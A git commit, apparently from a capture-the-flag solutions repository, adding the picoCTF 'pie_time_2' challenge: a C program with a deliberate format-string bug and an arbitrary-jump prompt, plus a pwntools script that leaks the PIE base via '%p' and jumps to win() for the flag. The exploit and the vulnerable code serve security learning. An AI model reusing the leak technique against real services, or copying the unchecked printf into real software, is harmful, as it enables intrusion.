pwn/pie_time_2
This commit is contained in:
@@ -0,0 +1 @@
|
||||
picoCTF{dummy}
|
||||
Executable
+44
@@ -0,0 +1,44 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
|
||||
|
||||
def conn() -> remote:
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
|
||||
# gdb.attach(r, gdbscript='''
|
||||
# info proc mappings
|
||||
# c
|
||||
# ''')
|
||||
|
||||
# Calculated by inspecting the output - the reported binary start address from gdb
|
||||
leak_offset = 0x1441
|
||||
|
||||
r.recvuntil(b'Enter your name:').decode()
|
||||
r.sendline(b'%p\t'*20)
|
||||
leaks = r.recvline().strip().decode().split('\t')
|
||||
base_leak = leaks[18]
|
||||
exe.address = int(base_leak[2:], 16) - leak_offset
|
||||
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
|
||||
|
||||
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
|
||||
r.sendline(hex(exe.symbols['win']))
|
||||
print(r.recvall().decode())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,56 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void segfault_handler() {
|
||||
printf("Segfault Occurred, incorrect address.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void call_functions() {
|
||||
char buffer[64];
|
||||
printf("Enter your name:");
|
||||
fgets(buffer, 64, stdin);
|
||||
printf(buffer);
|
||||
|
||||
unsigned long val;
|
||||
printf(" enter the address to jump to, ex => 0x12345: ");
|
||||
scanf("%lx", &val);
|
||||
|
||||
void (*foo)(void) = (void (*)())val;
|
||||
foo();
|
||||
}
|
||||
|
||||
int win() {
|
||||
FILE *fptr;
|
||||
char c;
|
||||
|
||||
printf("You won!\n");
|
||||
// Open file
|
||||
fptr = fopen("flag.txt", "r");
|
||||
if (fptr == NULL)
|
||||
{
|
||||
printf("Cannot open file.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
// Read contents from file
|
||||
c = fgetc(fptr);
|
||||
while (c != EOF)
|
||||
{
|
||||
printf ("%c", c);
|
||||
c = fgetc(fptr);
|
||||
}
|
||||
|
||||
printf("\n");
|
||||
fclose(fptr);
|
||||
}
|
||||
|
||||
int main() {
|
||||
signal(SIGSEGV, segfault_handler);
|
||||
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
|
||||
|
||||
call_functions();
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user